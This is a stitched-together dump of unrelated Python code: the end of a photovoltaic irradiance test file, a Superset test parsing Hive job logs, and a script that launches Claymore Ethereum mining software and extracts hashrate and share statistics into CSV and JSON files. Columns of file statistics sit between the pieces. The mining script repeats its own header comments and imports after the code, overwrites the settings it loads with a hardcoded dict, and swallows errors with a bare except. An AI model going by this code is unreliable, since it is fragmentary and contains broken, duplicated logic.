7.24863775, 7.24863775, 774.72555557, 3.61016321,
7.24863775, 7.24863775, 775.89816756, 7.24863775]
# pvrow direct
np.testing.assert_almost_equal(
pvarray.ts_pvrows[2].back.get_param_weighted('direct'),
expected_dni_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.illum.get_param_weighted('direct'), expected_dni_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.shaded.get_param_weighted('direct'), 0.)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].front.get_param_weighted('direct'), 0.)
# pvrow circumsolar
np.testing.assert_almost_equal(
pvarray.ts_pvrows[2].back.get_param_weighted('circumsolar'),
expected_circ_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.illum.get_param_weighted('circumsolar'),
expected_circ_pvrow)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.shaded.get_param_weighted('circumsolar'), 0.)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.list_segments[0]
.illum.get_param_weighted('circumsolar'), 0.)
# pvrow horizon
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].front.get_param_weighted('horizon'),
expected_hor_pvrow_no_shad)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.illum.get_param_weighted('horizon'),
expected_hor_pvrow_w_shad_1)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.shaded.get_param_weighted('horizon'),
expected_hor_pvrow_w_shad_2)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].back.list_segments[0]
.illum.get_param_weighted('horizon'),
expected_hor_pvrow_w_shad_1)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].back.list_segments[0]
.shaded.get_param_weighted('horizon'),
expected_hor_pvrow_w_shad_2)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.illum.get_param_weighted('horizon_shd_pct'),
horizon_shading_pct_1)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[1].back.list_segments[0]
.shaded.get_param_weighted('horizon_shd_pct'),
horizon_shading_pct_2)
# ground
np.testing.assert_almost_equal(
pvarray.ts_ground.get_param_weighted('horizon'), 0.)
np.testing.assert_almost_equal(
pvarray.ts_ground
.illum.get_param_weighted('direct'), expected_dni_ground)
np.testing.assert_almost_equal(
pvarray.ts_ground
.illum.get_param_weighted('circumsolar'),
expected_circ_ground)
np.testing.assert_almost_equal(
pvarray.ts_ground
.shaded.get_param_weighted('direct'), 0.)
np.testing.assert_array_almost_equal(expected_irradiance_mat,
np.squeeze(irradiance_mat))
# Check invrho_mat
expected_invrho_mat = [
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
5., 5., 5., 5.,
100., 100., 33.33333333, 33.33333333,
100., 100., 33.33333333, 33.33333333,
100., 100., 33.33333333, 33.33333333]
np.testing.assert_array_almost_equal(np.squeeze(invrho_mat), expected_invrho_mat)
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].front.get_param_weighted('rho'),
params_irr['rho_front_pvrow'])
np.testing.assert_almost_equal(
pvarray.ts_pvrows[0].back.get_param_weighted('rho'),
params_irr['rho_back_pvrow'])
np.testing.assert_almost_equal(
pvarray.ts_ground.get_param_weighted('rho'),
params_irr['rho_ground'])
# Check total perez vec
expected_total_perez_mat = [
63.21759296, 63.21759296, 63.21759296, 63.21759296,
63.21759296, 63.21759296, 63.21759296, 63.21759296,
63.21759296, 63.21759296, 63.21759296, 63.21759296,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
522.61826174, 522.61826174, 522.61826174, 522.61826174,
104.38724754, 104.38724754, 0., 0.,
104.38724754, 104.38724754, 0., 0.,
104.38724754, 104.38724754, 0., 0.]
np.testing.assert_array_almost_equal(np.squeeze(total_perez_mat),
expected_total_perez_mat)
# Get ts modeling matrices
irradiance_mat, rho_mat, invrho_mat, total_perez_mat = \
irr_model.get_full_ts_modeling_vectors(pvarray)
# check that 2 dimensional
assert irradiance_mat.shape == (41, 1)
def test_hybridperez_circ_shading():
"""Check that the function works and returns expected outputs"""
circumsolar_angle = 30.
circumsolar_model = 'uniform_disk'
irr_model = HybridPerezOrdered(circumsolar_angle=circumsolar_angle,
circumsolar_model=circumsolar_model)
surf = PVSurface(coords=[(0, -1), (0, 1)])
pvrows = [PVRow.from_linestring_coords([(1, -1), (1, 1)])]
solar_2d_vector = [1.2, 1] # <45 deg elevation so should have >50% shading
idx_neighbor = 0
circ_shading_pct = irr_model._calculate_circumsolar_shading_pct(
surf, idx_neighbor, pvrows, solar_2d_vector)
np.testing.assert_almost_equal(circ_shading_pct, 71.5969299216)
def test_hybridperez_horizon_shading_ts():
# Base params
params = {
'n_pvrows': 3,
'pvrow_height': 1,
'pvrow_width': 1,
'axis_azimuth': 0.,
'gcr': 0.3
}
# Timeseries inputs
df_inputs = pd.DataFrame({
'solar_zenith': [70., 80., 80., 70., 10.],
'solar_azimuth': [270., 90., 270., 90., 90.],
'surface_tilt': [20., 10., 20., 30., 0.],
'surface_azimuth': [270., 270., 90., 90., 90.]})
# Initialize and fit pv array
pvarray = OrderedPVArray.init_from_dict(params)
# Fit pv array to timeseries data
pvarray.fit(df_inputs.solar_zenith, df_inputs.solar_azimuth,
df_inputs.surface_tilt, df_inputs.surface_azimuth)
# irradiance model
model = HybridPerezOrdered(horizon_band_angle=15.)
pvrow_idx = 1
centroid_coords = (pvarray.ts_pvrows[pvrow_idx].back.list_segments[0]
.coords.centroid)
tilted_to_left = pvarray.rotation_vec > 0
horizon_pct_shading = model._calculate_horizon_shading_pct_ts(
pvarray.ts_pvrows, centroid_coords, pvrow_idx, tilted_to_left,
is_back_side=True)
# Check that values stay consistent
expected_pct_shading = np.array(
[17.163813, 8.667262, 17.163813, 25.317135, 0.])
np.testing.assert_allclose(expected_pct_shading, horizon_pct_shading)
def test_hybridperez_transform(df_inputs_clearsky_8760):
n_points = 24
df_inputs = df_inputs_clearsky_8760.iloc[:n_points, :]
# Base params
params = {
'n_pvrows': 3,
'pvrow_height': 1,
'pvrow_width': 1,
'axis_azimuth': 0.,
'gcr': 0.3
}
albedo = 0.2
# Initialize and fit pv array
pvarray = OrderedPVArray.init_from_dict(params)
# Fit pv array to timeseries data
pvarray.fit(df_inputs.solar_zenith, df_inputs.solar_azimuth,
df_inputs.surface_tilt, df_inputs.surface_azimuth)
# irradiance model
model = HybridPerezOrdered(horizon_band_angle=15.)
model.fit(df_inputs.index, df_inputs.dni.values, df_inputs.dhi.values,
df_inputs.solar_zenith.values, df_inputs.solar_azimuth.values,
df_inputs.surface_tilt.values, df_inputs.surface_azimuth.values,
albedo)
model.transform(pvarray)
# Check timeseries parameters
expected_middle_back_horizon = np.array(
[0., 0., 0., 0., 0., 0.,
0., 0.8244883, 4.43051118, 6.12136418, 6.03641816, 2.75109931,
3.15586037, 6.14709947, 6.02242241, 4.25283177, 0.58518296, 0.,
0., 0., 0., 0., 0., 0.])
list_idx = np.where(expected_middle_back_horizon != 0)
np.testing.assert_allclose(
expected_middle_back_horizon[list_idx],
pvarray.ts_pvrows[1].back.list_segments[0]
.illum.get_param_weighted('horizon')[list_idx])
expected_ground_circ = np.array(
[0., 0., 0., 0., 0.,
0., 0., 2.19047189, 8.14152575, 13.9017384,
18.54394777, 21.11510529, 21.00554831, 18.24251837, 13.47583799,
7.66930532, 1.74693357, 0., 0., 0.,
0., 0., 0., 0.])
np.testing.assert_allclose(
expected_ground_circ,
pvarray.ts_ground.illum_params['circumsolar'])
np.testing.assert_allclose(
np.zeros(n_points),
pvarray.ts_ground.shaded_params['circumsolar'])
# Check at a given time idx
pvrow = pvarray.ts_pvrows[1].at(7)
np.testing.assert_allclose(
pvrow.back.list_segments[0]
.illum_collection.get_param_weighted('horizon'),
expected_middle_back_horizon[7])
pvground = pvarray.ts_ground.at(7)
np.testing.assert_allclose(
pvground.list_segments[0].illum_collection
.get_param_weighted('circumsolar'),
expected_ground_circ[7])
def test_hybridperez_ordered_transparency_spacing_front(params_irr):
"""Check that module transparency and spacing params are applied
correctly in HybridPerezOrdered"""
# Apply irradiance model
DNI = 1000.
DHI = 100.
ts = dt.datetime(2019, 6, 14, 11)
irr_parameters = {'horizon_band_angle': 6.5,
'module_transparency': 0.1,
'module_spacing_ratio': 0.1}
irr_model = HybridPerezOrdered(**irr_parameters)
irr_model.fit(ts, DNI, DHI,
params_irr['solar_zenith'],
params_irr['solar_azimuth'],
params_irr['surface_tilt'],
params_irr['surface_azimuth'],
params_irr['rho_ground'])
# Create, fit, and transform pv array
pvarray = OrderedPVArray.fit_from_dict_of_scalars(
params_irr, param_names=IsotropicOrdered.params)
irr_model.transform(pvarray)
gnd_seg = pvarray.ts_ground
pvrow_front = pvarray.ts_pvrows[1].front
# check that front is shaded
assert pvrow_front.shaded_length > 0
# Run some checks
surf_gnd_shaded = gnd_seg.shaded.list_ts_surfaces[0]
surf_gnd_illum = gnd_seg.illum.list_ts_surfaces[0]
np.testing.assert_allclose(surf_gnd_illum.get_param('circumsolar') * 0.19,
surf_gnd_shaded.get_param('circumsolar'))
np.testing.assert_allclose(surf_gnd_illum.get_param('direct') * 0.19,
surf_gnd_shaded.get_param('direct'))
# Run check on pvrow surfaces
surf_pvrow_shaded = (pvrow_front.list_segments[0]
.shaded.list_ts_surfaces[0])
surf_pvrow_illum = (pvrow_front.list_segments[0]
.illum.list_ts_surfaces[0])
np.testing.assert_allclose(surf_pvrow_illum.get_param('direct') * 0.19,
surf_pvrow_shaded.get_param('direct'))
np.testing.assert_allclose(
surf_pvrow_illum.get_param('circumsolar') * 0.19,
surf_pvrow_shaded.get_param('circumsolar'))
def test_hybridperez_ordered_transparency_spacing_back(params_irr):
"""Check that module transparency and spacing params are applied
correctly in HybridPerezOrdered"""
params_irr.update({'surface_azimuth': 270,
'surface_tilt': 160})
# Apply irradiance model
DNI = 1000.
DHI = 100.
ts = dt.datetime(2019, 6, 14, 11)
irr_parameters = {'horizon_band_angle': 6.5,
'module_transparency': 0.1,
'module_spacing_ratio': 0.1}
irr_model = HybridPerezOrdered(**irr_parameters)
irr_model.fit(ts, DNI, DHI,
params_irr['solar_zenith'],
params_irr['solar_azimuth'],
params_irr['surface_tilt'],
params_irr['surface_azimuth'],
params_irr['rho_ground'])
# Create, fit, and transform pv array
pvarray = OrderedPVArray.fit_from_dict_of_scalars(
params_irr, param_names=IsotropicOrdered.params)
irr_model.transform(pvarray)
gnd_seg = pvarray.ts_ground
pvrow_back = pvarray.ts_pvrows[1].back
# check that back is shaded
assert pvrow_back.shaded_length > 0
# Run some checks on gnd surfaces
surf_gnd_shaded = gnd_seg.shaded.list_ts_surfaces[0]
surf_gnd_illum = gnd_seg.illum.list_ts_surfaces[0]
np.testing.assert_allclose(surf_gnd_illum.get_param('circumsolar') * 0.19,
surf_gnd_shaded.get_param('circumsolar'))
np.testing.assert_allclose(surf_gnd_illum.get_param('direct') * 0.19,
surf_gnd_shaded.get_param('direct'))
# Run check on pvrow surfaces
surf_pvrow_shaded = (pvrow_back.list_segments[0]
.shaded.list_ts_surfaces[0])
surf_pvrow_illum = (pvrow_back.list_segments[0]
.illum.list_ts_surfaces[0])
np.testing.assert_allclose(surf_pvrow_illum.get_param('direct') * 0.19,
surf_pvrow_shaded.get_param('direct'))
np.testing.assert_allclose(
surf_pvrow_illum.get_param('circumsolar') * 0.19,
surf_pvrow_shaded.get_param('circumsolar'))
def test_isotropic_ordered_transparency_spacing(params_irr):
"""Check that module transparency and spacing params are applied
correctly in IsotropicOrdered"""
# Apply irradiance model
DNI = 1000.
DHI = 100.
ts = dt.datetime(2019, 6, 14, 11)
irr_parameters = {'module_transparency': 0.1,
'module_spacing_ratio': 0.1}
irr_model = IsotropicOrdered(**irr_parameters)
irr_model.fit(ts, DNI, DHI,
params_irr['solar_zenith'],
params_irr['solar_azimuth'],
params_irr['surface_tilt'],
params_irr['surface_azimuth'],
params_irr['rho_ground'])
# Create, fit, and transform pv array
pvarray = OrderedPVArray.fit_from_dict_of_scalars(
params_irr, param_names=IsotropicOrdered.params)
irr_model.transform(pvarray)
gnd_seg = pvarray.ts_ground
pvrow_front = pvarray.ts_pvrows[1].front
# check that front is shaded
assert pvrow_front.shaded_length > 0
# Run some checks
surf_gnd_shaded = gnd_seg.shaded.list_ts_surfaces[0]
surf_gnd_illum = gnd_seg.illum.list_ts_surfaces[0]
np.testing.assert_allclose(surf_gnd_illum.get_param('direct') * 0.19,
surf_gnd_shaded.get_param('direct'))
# Run check on pvrow surfaces
surf_pvrow_shaded = (pvrow_front.list_segments[0]
.shaded.list_ts_surfaces[0])
surf_pvrow_illum = (pvrow_front.list_segments[0]
.illum.list_ts_surfaces[0])
np.testing.assert_allclose(surf_pvrow_illum.get_param('direct') * 0.19,
surf_pvrow_shaded.get_param('direct'))
def test_initialize_rho():
"""Make sure that rho is initialized correctly"""
model = BaseModel()
# rho values
rho_scalar = 0.50
rho_default = 0.01
rho_calculated = 0.10
# Should use scalar input
rho_out = model.initialize_rho(rho_scalar, rho_calculated, rho_default)
assert rho_out == rho_scalar
# Should use calculated
rho_out = model.initialize_rho(None, rho_calculated, rho_default)
np.testing.assert_allclose(rho_out, rho_calculated)
# Should use default
rho_out = model.initialize_rho(None, None, rho_default)
np.testing.assert_allclose(rho_out, rho_default)
| 39.692982
| 85
| 0.64884
| 4,659
| 36,200
| 4.748444
| 0.067396
| 0.009764
| 0.014103
| 0.018081
| 0.859242
| 0.847896
| 0.82977
| 0.827329
| 0.820684
| 0.810921
| 0
| 0.136261
| 0.239558
| 36,200
| 911
| 86
| 39.736553
| 0.667393
| 0.077431
| 0
| 0.774011
| 0
| 0
| 0.059549
| 0
| 0
| 0
| 0
| 0.001098
| 0.180791
| 1
| 0.016949
| false
| 0
| 0.014124
| 0
| 0.031073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67d5d0d022a52049119d5e59878e261ac97e8232
| 4,097
|
py
|
Python
|
tests/db_engine_specs_test.py
|
Marcelo-Lourenco/incubator-superset
|
70c7315ae012a16c5c9c2b8fbd30780809f1932a
|
[
"Apache-2.0"
] | 1
|
2021-02-22T03:27:27.000Z
|
2021-02-22T03:27:27.000Z
|
tests/db_engine_specs_test.py
|
Marcelo-Lourenco/incubator-superset
|
70c7315ae012a16c5c9c2b8fbd30780809f1932a
|
[
"Apache-2.0"
] | null | null | null |
tests/db_engine_specs_test.py
|
Marcelo-Lourenco/incubator-superset
|
70c7315ae012a16c5c9c2b8fbd30780809f1932a
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from superset.db_engine_specs import HiveEngineSpec
class DbEngineSpecsTestCase(unittest.TestCase):
def test_0_progress(self):
log = """
17/02/07 18:26:27 INFO log.PerfLogger: <PERFLOG method=compile from=org.apache.hadoop.hive.ql.Driver>
17/02/07 18:26:27 INFO log.PerfLogger: <PERFLOG method=parse from=org.apache.hadoop.hive.ql.Driver>
""".split('\n')
self.assertEquals(
0, HiveEngineSpec.progress(log))
def test_number_of_jobs_progress(self):
log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
""".split('\n')
self.assertEquals(0, HiveEngineSpec.progress(log))
def test_job_1_launched_progress(self):
log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
""".split('\n')
self.assertEquals(0, HiveEngineSpec.progress(log))
def test_job_1_launched_stage_1_0_progress(self):
log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%, reduce = 0%
""".split('\n')
self.assertEquals(0, HiveEngineSpec.progress(log))
def test_job_1_launched_stage_1_map_40_progress(self):
log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%, reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 40%, reduce = 0%
""".split('\n')
self.assertEquals(10, HiveEngineSpec.progress(log))
def test_job_1_launched_stage_1_map_80_reduce_40_progress(self):
log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%, reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 40%, reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 80%, reduce = 40%
""".split('\n')
self.assertEquals(30, HiveEngineSpec.progress(log))
def test_job_1_launched_stage_2_stages_progress(self):
log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%, reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 40%, reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 80%, reduce = 40%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-2 map = 0%, reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 100%, reduce = 0%
""".split('\n')
self.assertEquals(12, HiveEngineSpec.progress(log))
def test_job_2_launched_stage_2_stages_progress(self):
log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 100%, reduce = 0%
17/02/07 19:15:55 INFO ql.Driver: Launching Job 2 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%, reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 40%, reduce = 0%
""".split('\n')
self.assertEquals(60, HiveEngineSpec.progress(log))
| 49.963415
| 113
| 0.614108
| 712
| 4,097
| 3.435393
| 0.105337
| 0.071954
| 0.103025
| 0.091578
| 0.875715
| 0.875715
| 0.849141
| 0.816844
| 0.816844
| 0.802126
| 0
| 0.229765
| 0.252136
| 4,097
| 81
| 114
| 50.580247
| 0.568538
| 0
| 0
| 0.642857
| 0
| 0.328571
| 0.650232
| 0.01855
| 0
| 0
| 0
| 0
| 0.114286
| 1
| 0.114286
| false
| 0
| 0.085714
| 0
| 0.214286
| 0.014286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c0154f00b37182fd21d3956197d0625c454e4d7d
| 19,612
|
py
|
Python
|
claymoreminerdataextractor.py
|
kynrek/ClaymoreMinerDataExtractor
|
e97b8219431ee4f9e9debaff49e2915725b35501
|
[
"MIT"
] | 1
|
2021-02-23T03:33:39.000Z
|
2021-02-23T03:33:39.000Z
|
claymoreminerdataextractor.py
|
kynrek/ClaymoreMinerDataExtractor
|
e97b8219431ee4f9e9debaff49e2915725b35501
|
[
"MIT"
] | null | null | null |
claymoreminerdataextractor.py
|
kynrek/ClaymoreMinerDataExtractor
|
e97b8219431ee4f9e9debaff49e2915725b35501
|
[
"MIT"
] | null | null | null |
#Claymore Miner Data Extraction
#author Joshua Witt kynrek@gmail.com
#Date 2-21-2021
#Description : This python script is designed to capture the standard output from claymore miner and
#extract details from the text as json objects
#Claymore Miner Data Extraction
#author Joshua Witt kynrek@gmail.com
#Date 2-21-2021
#Description : This python script is designed to capture the standard output from claymore miner and
#extract details from the text as json objects
#below is a sample command
#The script accepts a command line parameter of the folder where to store the output log/data files
import os, sys
import subprocess
from subprocess import Popen, PIPE
import json
import re
from datetime import datetime
import argparse as ap
parser = ap.ArgumentParser(description="Claymore Miner Data Extractor")
output_directory = ''
parser.add_argument('-o', '--outputlocation', type=str, help='directory where logs and report files will be saved')
parser.add_argument('-s', '--settingsfile', type=str, help='location of a .json settings file for the miner')
args = parser.parse_args()
#if get the output location argument and assign it to
#output_directory, if there is no trailing slash for
#the directory then add it
if args.outputlocation is not None:
if args.outputlocation[-1] != '\\':
output_directory = '{}\\'.format(args.outputlocation)
else:
output_directory = args.outputlocation
if not os.path.isdir(output_directory):
sys.stdout.write('Output Directory {} does not exist'.format(output_directory))
exit(-1)
#load the miner settings json file
#miner_settings_file_path = 'miner_settings.json'
if args.settingsfile is not None:
if os.path.isfile(args.settingsfile):
# Opening JSON file
settings_file = open(args.settingsfile)
# It returns JSON object as dictionary
try:
miner_settings = json.load(settings_file)
except Exception as e:
sys.stdout.write('error parsing settings file {}'.format(str(e)))
exit(-3)
else:
sys.stdout.write('miner settings file {} does not exist'.format(args.settingsfile))
exit(-2)
mining_pool_username = miner_settings['ewal'].split('.')[0]
mining_pool_worker_name = miner_settings['ewal'].split('.')[1].split(':')[0]
miner_settings = {
"executable" : "C:\Claymore.s.dual.ethereum.v15.0.-.widows\EthDcrMiner64.exe",
"epool" : "us-east.ethash-hub.miningpoolhub.com:20535",
"ewal" : "kynrek.3070:x",
"fanmin" : "75",
"fanmax": "100",
"epsw" : "x",
"mode" : "1",
"dbg" : "-1",
"mport" : "0",
"etha" : "0",
"ftime" : "55",
"retrydelay" : "1",
"tt" : "79",
"ttli" : "77",
"tstop" : "89",
"esm" : "2"
}
mining_command = []
for setting_key in miner_settings:
if setting_key == 'executable':
mining_command.append(miner_settings[setting_key])
else:
mining_command.append("-{}".format(setting_key))
mining_command.append(miner_settings[setting_key])
print(mining_command)
#get the current timestamp for naming files
fileNow = datetime.now().strftime("%m-%d-%Y-%H-%M-%S")
#create a variable to count the number of summary records written
summary_records_written = 0
#generate our file names
summaryCSVFileName = '{}minerSummary-{}.csv'.format(output_directory,fileNow)
summaryJSONFileName = '{}minerSummary-{}.json'.format(output_directory,fileNow)
summaryLogFileName = '{}logfile-{}.txt'.format(output_directory,fileNow)
mining_pool_username = miner_settings['ewal'].split('.')[0]
mining_pool_worker_name = miner_settings['ewal'].split('.')[1].split(':')[0]
#open our files for write only mode
summaryCSVFile = open(summaryCSVFileName,"w")
summaryJSONFile = open(summaryJSONFileName,"w")
summaryLogFile = open(summaryLogFileName,"w")
#write to the log file to note the start time
summaryLogFile.write('Process Claymore Data Script for account {} worker {} Started {}\n'.format(mining_pool_username,mining_pool_worker_name,datetime.now().strftime("%m/%d/%Y %H-%M-%S")))
summaryLogFile.flush()
#initialize maximumDifficultyOfFoundShare as it is not always present and we need an initial value
maximumDifficultyOfFoundShare = ""
#create our list of files for our CSV file header
fields = [
'miningPoolUsername',
'miningPoolWorkerName',
'hoursMined',
'minutesMined',
'timeStampMonth',
'timeStampDay',
'timeStampHours',
'timeStampMinutes',
'miningServer',
'miningPort',
'miningDurationHours',
'miningDurationMinutes',
'incorrectShares',
'incorrectSharePercentage',
'estimatedStalesPercentage',
'maximumDifficultyOfFoundShare',
'acceptedShares',
'staleShares',
'rejectedShares',
'rejectedStaleShares',
'averageSpeedMinutes',
'averageMegaHashes',
'effectiveSpeed',
'effectiveSpeedAtPool',
'recordLastModified'
]
#create the header line string
headerString = ','.join(fields)
summaryCSVFile.write('{}\n'.format(headerString))
summaryCSVFile.flush()
summaryJSONFile.write('[\n')
summaryJSONFile.flush()
try:
#Start the miner program using subprocess in order to capture the output
p = subprocess.Popen(mining_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
retcode = p.poll()
input_line = p.stdout.readline().decode('utf-8')
sys.stdout.write(input_line)
#get the timestamp from the first line of the summary
m = re.match("\*+ (\d+):(\d+) \*+ (\d+)/(\d+) (\d+):(\d+).*", input_line)
if m:
matches = m.groups()
timeStamp = {
"hoursMined" : matches[0],
"minutesMined" : matches[1],
"timeStampMonth" : matches[2],
"timeStampDay" : matches[3],
"timeStampHours" : matches[4],
"timeStampMinutes" : matches[5]
}
#get connection info
#g='Eth: Mining ETH on us-east.ethash-hub.miningpoolhub.com:20535 for 0:19'
m = re.match("Eth: Mining ETH on (.*):(\d+) for (\d+):(\d+)", input_line)
if m:
matches=m.groups()
connectionInfo= {
'miningServer' : matches[0],
'miningPort' : matches[1],
'miningDurationHours' : matches[2],
'miningDurationMinutes' : matches[3]
}
#print(connectionInfo)
#get incorrect shares line
m = re.match("Eth: Incorrect shares (\d+) \((\d+\.\d+)\%\), est. stales percentage (\d+\.\d+)\%", input_line)
if m:
matches=m.groups()
incorrectShares={
"incorrectShares" : matches[0],
"incorrectSharePercentage" : matches[1],
"estimatedStalesPercentage" : matches[2]
}
#get max difficulty
m = re.match("Eth: Maximum difficulty of found share: (\d+.\d+) GH \(!\)", input_line)
if m:
matches=m.groups()
maximumDifficultyOfFoundShare = matches[0]
#get Share count
m = re.match("Eth: Accepted shares (\d+) \((\d+) stales\), rejected shares (\d+) \((\d+) stales\)", input_line)
if m:
matches = m.groups()
shareCount = {
"acceptedShares" : matches[0],
"staleShares" : matches[1],
"rejectedShares" : matches[2],
"rejectedStaleShares" : matches[3]
}
#get average speed
m = re.match("Eth: Average speed \((\d+) min\): (\d+.\d+) MH/s", input_line)
if m:
matches=m.groups()
averageSpeed = {
'averageSpeedMinutes' : matches[0],
'averageMegaHashes' : matches[1]
}
#get effective speed
m = re.match("Eth: Effective speed: (\d+.\d+) MH/s; at pool: (\d+.\d+) MH/s", input_line)
if m:
matches=m.groups()
effectiveSpeed = {
'effectiveSpeed' : matches[0],
'effectiveSpeedAtPool' : matches[1]
}
summaryRecord = {
'miningPoolUsername' : mining_pool_username,
'miningPoolWorkerName' : mining_pool_worker_name,
'timeStamp' : timeStamp,
'connectionInfo' : connectionInfo,
'shareCount' : shareCount,
'incorrectShares' : incorrectShares,
'maximumDifficultyOfFoundShare' : maximumDifficultyOfFoundShare,
'averageSpeed' : averageSpeed,
'effectiveSpeed' : effectiveSpeed
}
if summary_records_written > 0:
summaryJSONFile.write(',{}\n'.format(summaryRecord))
summaryJSONFile.flush()
else:
summaryJSONFile.write('{}\n'.format(json.dumps(summaryRecord)))
summaryJSONFile.flush()
summary_records_written = summary_records_written + 1
values=[
mining_pool_username,
mining_pool_worker_name,
timeStamp['hoursMined'],
timeStamp['minutesMined'],
timeStamp['timeStampMonth'],
timeStamp['timeStampDay'],
timeStamp['timeStampHours'],
timeStamp['timeStampMinutes'],
connectionInfo['miningServer'],
connectionInfo['miningPort'],
connectionInfo['miningDurationHours'],
connectionInfo['miningDurationMinutes'],
incorrectShares['incorrectShares'],
incorrectShares['incorrectSharePercentage'],
incorrectShares['estimatedStalesPercentage'],
maximumDifficultyOfFoundShare,
shareCount['acceptedShares'],
shareCount['staleShares'],
shareCount['rejectedShares'],
shareCount['rejectedStaleShares'],
averageSpeed['averageSpeedMinutes'],
averageSpeed['averageMegaHashes'],
effectiveSpeed['effectiveSpeed'],
effectiveSpeed['effectiveSpeedAtPool'],
datetime.now().strftime("%m/%d/%Y %H:%M:%S")
]
dataString = ','.join(values)
summaryCSVFile.write('{}\n'.format(dataString))
summaryCSVFile.flush()
#get GPU Details
#h='GPU1: 43C 75% 120W'
m = re.match("GPU(\d+): (\d+)C (\d+)% (\d+)W", input_line)
if m:
matches=m.groups()
gpuDetails={
'gpuNumber' : matches[0],
'gpuTemperatureCelcius' : matches[1],
'gpuPowerPercentage' : matches[2],
'gpuWattage' : matches[3]
}
#get GPU Details
#j='GPUs power: 119.8 W'
m = re.match("GPUs power: (\d+.\d+) W", input_line)
if m:
matches=m.groups()
gpuPower={
'totalGPUsPower' : matches[0]
}
#getspeedupdate
#k='Eth speed: 57.581 MH/s, shares: 17/0/0, time: 1:05'
m = re.match("Eth speed: (\d+.\d+) MH/s, shares: (\d+)/(\d+)/(\d+), time: (\d+):(\d+)", input_line)
if m:
matches=m.groups()
speedUpdate={
'ethSpeedMegaHashes' : matches[0],
'acceptedShares' : matches[1],
'staleShares' : matches[2],
'rejectedShares' : matches[3],
'miningDurationHours' : matches[4],
'miningDurationMinutes' : matches[5]
}
if retcode is not None:
break
except:
p.terminate()
#make sure to terminate the process and write close the json array in the output file
finally:
summaryJSONFile.write(']\n')
summaryJSONFile.flush()
summaryLogFile.write('Process Claymore Data Script for account {} worker {} Ended {}\n'.format(mining_pool_username,mining_pool_worker_name,datetime.now().strftime("%m/%d/%Y %H-%M-%S")))
summaryLogFile.flush()
#below is a sample command
#The script accepts a command line parameter of the folder where to store the output log/data files
import os, sys
import subprocess
from subprocess import Popen, PIPE
import json
import re
from datetime import datetime
import argparse as ap
